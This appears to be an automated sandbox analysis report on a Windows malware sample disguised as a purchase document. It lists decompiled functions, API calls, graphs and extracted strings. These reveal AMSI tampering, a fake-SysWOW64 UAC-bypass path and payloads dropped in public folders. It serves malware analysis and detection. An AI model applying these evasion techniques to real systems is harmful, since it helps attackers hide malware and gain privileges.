                                                                                                                                                                                                                            • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                                                                                                                            • Part of subcall function 02B2DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
                                                                                                                                                                                                                            • Part of subcall function 02B2DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
                                                                                                                                                                                                                            • Part of subcall function 02B2DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
                                                                                                                                                                                                                            • Part of subcall function 02B2DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
                                                                                                                                                                                                                            • Part of subcall function 02B28338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,Initialize,02B97380,02B3B7B8,00000000,00000000,00000000,ScanString,02B97380,02B3B7B8), ref: 02B3B2FA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                                                                                                          • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                                                                          • API String ID: 2769005614-3738268246
                                                                                                                                                                                                                          • Opcode ID: 04328828d6d82fd6c1147251dd6a065ad74ed4474d361b36479348b3b70a6c25
                                                                                                                                                                                                                          • Instruction ID: 3b474daacc5860f6207b0732d1cef65210261a39ded1c710ba4e0d4c46b18a38
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 04328828d6d82fd6c1147251dd6a065ad74ed4474d361b36479348b3b70a6c25
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C43FA79A0422CDFDB11EB64DD809CE73BAFF85344FA041E5E109EB218DA30AE959F51
                                                                                                                                                                                                                          Function 02B33E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(742B0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,742B0000,00000000,00000000), ref: 02B28AAA
                                                                                                                                                                                                                            • Part of subcall function 02B2DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
                                                                                                                                                                                                                            • Part of subcall function 02B2DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
                                                                                                                                                                                                                            • Part of subcall function 02B2DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
                                                                                                                                                                                                                            • Part of subcall function 02B2DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,ScanBuffer,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,02B3BB30,00000000,00000000,02B3BB24,00000000,00000000), ref: 02B340CB
                                                                                                                                                                                                                            • Part of subcall function 02B288B8: LoadLibraryW.KERNEL32(amsi), ref: 02B288C1
                                                                                                                                                                                                                            • Part of subcall function 02B288B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B28920
                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,000003E8,ScanBuffer,02B97380,02B3B7B8,UacScan,02B97380), ref: 02B34277
                                                                                                                                                                                                                            • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                                                                                                                            • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                                                                                                                            • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                                                                                                                          • Sleep.KERNEL32(00004E20,UacScan,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,UacInitialize,02B97380,02B3B7B8), ref: 02B350EE
                                                                                                                                                                                                                            • Part of subcall function 02B2DC04: RtlI.N(?,?,00000000,02B2DC7E), ref: 02B2DC2C
                                                                                                                                                                                                                            • Part of subcall function 02B2DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC42
                                                                                                                                                                                                                            • Part of subcall function 02B2DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B2DC7E), ref: 02B2DC61
                                                                                                                                                                                                                            • Part of subcall function 02B17E5C: GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                                                                                                                            • Part of subcall function 02B285BC: WinExec.KERNEL32(?,?), ref: 02B28624
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                                                                                                                          • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                                                                                                                          • API String ID: 2171786310-3926298568
                                                                                                                                                                                                                          • Opcode ID: a5b7a353f178f0ba000926f55702d93c9aa022628ed425f8b21b61047277497a
                                                                                                                                                                                                                          • Instruction ID: 62078ccba6966533380f2eae02c982846eff6cc491d1a7ac3b9f7e4da3072893
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5b7a353f178f0ba000926f55702d93c9aa022628ed425f8b21b61047277497a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6143F475A0016D9FDB21EB64DD80BDE73B6FF85304FA040E6A409AB618DF30AE859F51
                                                                                                                                                                                                                          Function 02B2E678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 10970 2b2e678-2b2e67c 10971 2b2e681-2b2e686 10970->10971 10971->10971 10972 2b2e688-2b2ec81 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14740 * 2 call 2b14860 call 2b14778 call 2b130d4 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14740 call 2b17f2c call 2b149a0 call 2b14d74 call 2b14df0 call 2b14740 call 2b149a0 call 2b14d74 call 2b14df0 call 2b28788 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c 10971->10972 11175 2b2eee2-2b2ef2f call 2b14500 call 2b14c60 call 2b14500 call 2b14c60 call 2b14500 10972->11175 11176 2b2ec87-2b2eedd call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 WaitForSingleObject CloseHandle * 2 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c * 3 10972->11176 11176->11175
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(742B0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,742B0000,00000000,00000000), ref: 02B28AAA
                                                                                                                                                                                                                            • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                                                                                                                            • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                                                                                                                            • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                                                                                                                            • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000920,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C,OpenSession,02B97380), ref: 02B2ED6E
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C,OpenSession), ref: 02B2ED76
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(0000090C,00000000,00000000,000000FF,ScanString,02B97380,02B2EF4C,OpenSession,02B97380,02B2EF4C,UacScan,02B97380,02B2EF4C,ScanBuffer,02B97380,02B2EF4C), ref: 02B2ED7F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                                                                                                                          • String ID: )"C:\Users\Public\Libraries\ymafvvdS.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                                                                                                                          • API String ID: 3475578485-3731113069
                                                                                                                                                                                                                          • Opcode ID: 0a6ddb2d7eb5777d3af45d2f8b7fc4ea178817638cecd22a24c7050454c484b1
                                                                                                                                                                                                                          • Instruction ID: c80103336dc4fed7a1c2e7ba24b12b97f04995ee7cfe0ec7b825dfb9d7ce315a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a6ddb2d7eb5777d3af45d2f8b7fc4ea178817638cecd22a24c7050454c484b1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0622D375A0026D9FEB11FB65D881BCE73B6AF85300F5041E1A149EB254DB30EE49CF66
                                                                                                                                                                                                                          Function 02B11724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 13139 2b11724-2b11736 13140 2b11968-2b1196d 13139->13140 13141 2b1173c-2b1174c 13139->13141 13144 2b11a80-2b11a83 13140->13144 13145 2b11973-2b11984 13140->13145 13142 2b117a4-2b117ad 13141->13142 13143 2b1174e-2b1175b 13141->13143 13142->13143 13150 2b117af-2b117bb 13142->13150 13146 2b11774-2b11780 13143->13146 13147 2b1175d-2b1176a 13143->13147 13151 2b11684-2b116ad VirtualAlloc 13144->13151 13152 2b11a89-2b11a8b 13144->13152 13148 2b11986-2b119a2 13145->13148 13149 2b11938-2b11945 13145->13149 13158 2b117f0-2b117f9 13146->13158 13159 2b11782-2b11790 13146->13159 13153 2b11794-2b117a1 13147->13153 13154 2b1176c-2b11770 13147->13154 13160 2b119b0-2b119bf 13148->13160 13161 2b119a4-2b119ac 13148->13161 13149->13148 13155 2b11947-2b1195b Sleep 13149->13155 13150->13143 13162 2b117bd-2b117c9 13150->13162 13156 2b116df-2b116e5 13151->13156 13157 2b116af-2b116dc call 2b11644 13151->13157 13155->13148 13163 2b1195d-2b11964 Sleep 13155->13163 13157->13156 13169 2b117fb-2b11808 13158->13169 13170 2b1182c-2b11836 13158->13170 13166 2b119c1-2b119d5 13160->13166 13167 2b119d8-2b119e0 13160->13167 13165 2b11a0c-2b11a22 13161->13165 13162->13143 13168 2b117cb-2b117de Sleep 13162->13168 13163->13149 13171 2b11a24-2b11a32 13165->13171 13172 2b11a3b-2b11a47 13165->13172 13166->13165 13177 2b119e2-2b119fa 13167->13177 13178 2b119fc-2b119fe call 2b115cc 13167->13178 13168->13143 13176 2b117e4-2b117eb Sleep 13168->13176 13169->13170 13179 2b1180a-2b1181e Sleep 13169->13179 13173 2b118a8-2b118b4 13170->13173 13174 2b11838-2b11863 13170->13174 13171->13172 13180 2b11a34 13171->13180 13183 2b11a49-2b11a5c 13172->13183 13184 2b11a68 13172->13184 13185 2b118b6-2b118c8 13173->13185 13186 2b118dc-2b118eb call 2b115cc 13173->13186 13181 2b11865-2b11873 13174->13181 13182 2b1187c-2b1188a 13174->13182 13176->13142 13187 2b11a03-2b11a0b 13177->13187 13178->13187 13179->13170 13189 2b11820-2b11827 Sleep 13179->13189 13180->13172 13181->13182 13190 2b11875 13181->13190 13191 2b118f8 13182->13191 13192 2b1188c-2b118a6 call 2b11500 13182->13192 13193 2b11a6d-2b11a7f 13183->13193 13194 2b11a5e-2b11a63 call 2b11500 13183->13194 13184->13193 13195 2b118ca 13185->13195 13196 2b118cc-2b118da 13185->13196 13198 2b118fd-2b11936 13186->13198 13204 2b118ed-2b118f7 13186->13204 13189->13169 13190->13182 13191->13198 13192->13198 13194->13193 13195->13196 13196->13198
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,02B12000), ref: 02B117D0
                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00000000,?,02B12000), ref: 02B117E6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                          • Opcode ID: 0ca9bd1b1e55afa0bba095f8255723665db62d9419609990163a9b08d2bfdbe1
                                                                                                                                                                                                                          • Instruction ID: e98d19a584a4a14518f7b71833429673fc6a28459c8dd0196ed9c6544a041184
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ca9bd1b1e55afa0bba095f8255723665db62d9419609990163a9b08d2bfdbe1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DB15372A203518BCB15CF2CE980315BBF1EB86394F59C6EED65D8B385C735A452CB90
                                                                                                                                                                                                                          Function 02B288B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(amsi), ref: 02B288C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                            • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B28920
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                                                                                                          • String ID: DllGetClassObject$W$amsi
                                                                                                                                                                                                                          • API String ID: 941070894-2671292670
                                                                                                                                                                                                                          • Opcode ID: 73abcdcff65fe1647ab81f3d83f67567c4d9565d551df570b8e744055f09e53f
                                                                                                                                                                                                                          • Instruction ID: e7da6ab78f48232b107c71d9bf42d7596247465db451df0a5cebfbcc025119e1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73abcdcff65fe1647ab81f3d83f67567c4d9565d551df570b8e744055f09e53f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DF0A45044C381B9E300E3748C45F4BBFCD4B62264F408A98B1ECAA2D2D679D1089B77
                                                                                                                                                                                                                          Function 02B11A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 13227 2b11a8c-2b11a9b 13228 2b11aa1-2b11aa5 13227->13228 13229 2b11b6c-2b11b6f 13227->13229 13232 2b11aa7-2b11aae 13228->13232 13233 2b11b08-2b11b11 13228->13233 13230 2b11b75-2b11b7f 13229->13230 13231 2b11c5c-2b11c60 13229->13231 13235 2b11b81-2b11b8d 13230->13235 13236 2b11b3c-2b11b49 13230->13236 13239 2b11c66-2b11c6b 13231->13239 13240 2b116e8-2b1170b call 2b11644 VirtualFree 13231->13240 13237 2b11ab0-2b11abb 13232->13237 13238 2b11adc-2b11ade 13232->13238 13233->13232 13234 2b11b13-2b11b27 Sleep 13233->13234 13234->13232 13241 2b11b2d-2b11b38 Sleep 13234->13241 13243 2b11bc4-2b11bd2 13235->13243 13244 2b11b8f-2b11b92 13235->13244 13236->13235 13242 2b11b4b-2b11b5f Sleep 13236->13242 13245 2b11ac4-2b11ad9 13237->13245 13246 2b11abd-2b11ac2 13237->13246 13247 2b11ae0-2b11af1 13238->13247 13248 2b11af3 13238->13248 13258 2b11716 13240->13258 13259 2b1170d-2b11714 13240->13259 13241->13233 13242->13235 13252 2b11b61-2b11b68 Sleep 13242->13252 13250 2b11bd4-2b11bd9 call 2b114c0 13243->13250 13251 2b11b96-2b11b9a 13243->13251 13244->13251 13247->13248 13253 2b11af6-2b11b03 13247->13253 13248->13253 13250->13251 13256 2b11bdc-2b11be9 13251->13256 13257 2b11b9c-2b11ba2 13251->13257 13252->13236 13253->13230 13256->13257 13262 2b11beb-2b11bf2 call 2b114c0 13256->13262 13263 2b11bf4-2b11bfe 13257->13263 13264 2b11ba4-2b11bc2 call 2b11500 13257->13264 13260 2b11719-2b11723 13258->13260 13259->13260 13262->13257 13266 2b11c00-2b11c28 VirtualFree 13263->13266 13267 2b11c2c-2b11c59 call 2b11560 13263->13267
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,00000000,02B11FE4), ref: 02B11B17
                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B11FE4), ref: 02B11B31
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
